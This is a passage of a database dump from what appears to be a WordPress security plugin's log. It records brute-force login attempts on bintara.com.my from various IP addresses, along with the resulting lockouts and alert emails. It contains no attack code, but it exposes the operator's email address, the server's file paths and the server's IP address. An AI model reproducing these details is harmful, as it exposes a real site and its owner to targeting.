n.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074739.9341\";s:12:\"REQUEST_TIME\";s:10:\"1569074739\";}}','notice','2019-09-21 14:05:41','2019-09-21 14:05:40',17846696,19336408,'https://bintara.com.my/wp/wp-login.php',1,0,'157.230.92.254'),(26118,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:05:40\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:05:40\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:05:40\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:05:40\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:05:41','2019-09-21 14:05:40',17931464,19336408,'https://bintara.com.my/wp/wp-login.php',1,0,'157.230.92.254'),(26119,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:05:41','2019-09-21 14:05:40',18137760,19336408,'https://bintara.com.my/wp/wp-login.php',1,0,'157.230.92.254'),(26120,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYuWViJ7D9Gn7wDPh8k1QAAAMc\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"123.51.152.53\";s:11:\"REMOTE_PORT\";s:5:\"32890\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYuWViJ7D9Gn7wDPh8k1QAAAMc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074777.9333\";s:12:\"REQUEST_TIME\";s:10:\"1569074777\";}}','notice','2019-09-21 14:06:19','2019-09-21 14:06:18',17848800,19338856,'https://bintara.com.my/2019/wp-login.php',1,0,'123.51.152.53'),(26121,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:06:18\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:06:18\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:06:18\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:06:18\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:06:19','2019-09-21 14:06:18',17933416,19338856,'https://bintara.com.my/2019/wp-login.php',1,0,'123.51.152.53'),(26122,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:06:19','2019-09-21 14:06:18',18139664,19338856,'https://bintara.com.my/2019/wp-login.php',1,0,'123.51.152.53'),(26123,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYuXXkXpgmG5P@iB8k59gAAAJU\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"196.41.122.39\";s:11:\"REMOTE_PORT\";s:5:\"58372\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYuXXkXpgmG5P@iB8k59gAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569074781.947\";s:12:\"REQUEST_TIME\";s:10:\"1569074781\";}}','notice','2019-09-21 14:06:23','2019-09-21 14:06:22',17849056,19338304,'https://bintara.com.my/test/wp-login.php',1,0,'196.41.122.39'),(26124,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:06:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:06:22\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:06:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:06:22\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:06:23','2019-09-21 14:06:22',17933536,19338304,'https://bintara.com.my/test/wp-login.php',1,0,'196.41.122.39'),(26125,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:06:23','2019-09-21 14:06:22',18140400,19338304,'https://bintara.com.my/test/wp-login.php',1,0,'196.41.122.39'),(26126,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYuwViJ7D9Gn7wDPh8k5wAAAMk\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.157.149\";s:11:\"REMOTE_PORT\";s:5:\"47562\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYuwViJ7D9Gn7wDPh8k5wAAAMk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074881.4517\";s:12:\"REQUEST_TIME\";s:10:\"1569074881\";}}','notice','2019-09-21 14:08:02','2019-09-21 14:08:01',17847176,19337624,'https://bintara.com.my/wp/wp-login.php',1,0,'134.209.157.149'),(26127,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:08:01\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:08:01\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:08:01\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:08:01\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:08:02','2019-09-21 14:08:01',17931664,19337624,'https://bintara.com.my/wp/wp-login.php',1,0,'134.209.157.149'),(26128,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:08:02','2019-09-21 14:08:01',18138192,19337624,'https://bintara.com.my/wp/wp-login.php',1,0,'134.209.157.149'),(26129,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYuyHkXpgmG5P@iB8k6IwAAAIg\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.89.148.68\";s:11:\"REMOTE_PORT\";s:5:\"56432\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYuyHkXpgmG5P@iB8k6IwAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074888.8505\";s:12:\"REQUEST_TIME\";s:10:\"1569074888\";}}','notice','2019-09-21 14:08:10','2019-09-21 14:08:09',17849640,19338184,'https://bintara.com.my/test/wp-login.php',1,0,'159.89.148.68'),(26130,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:08:09\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:08:09\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:08:09\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:08:09\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:08:10','2019-09-21 14:08:09',17934368,19338184,'https://bintara.com.my/test/wp-login.php',1,0,'159.89.148.68'),(26131,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:08:10','2019-09-21 14:08:09',18140920,19338184,'https://bintara.com.my/test/wp-login.php',1,0,'159.89.148.68'),(26132,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYu73kXpgmG5P@iB8k6RgAAAIo\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"188.254.18.110\";s:11:\"REMOTE_PORT\";s:5:\"43634\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYu73kXpgmG5P@iB8k6RgAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569074927.487\";s:12:\"REQUEST_TIME\";s:10:\"1569074927\";}}','notice','2019-09-21 14:08:48','2019-09-21 14:08:47',17850216,19340888,'https://bintara.com.my/2019/wp-login.php',1,0,'188.254.18.110'),(26133,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:08:47\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:08:47\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:08:47\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:08:47\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:08:48','2019-09-21 14:08:47',17935064,19340888,'https://bintara.com.my/2019/wp-login.php',1,0,'188.254.18.110'),(26134,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:08:48','2019-09-21 14:08:47',18141544,19340888,'https://bintara.com.my/2019/wp-login.php',1,0,'188.254.18.110'),(26135,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 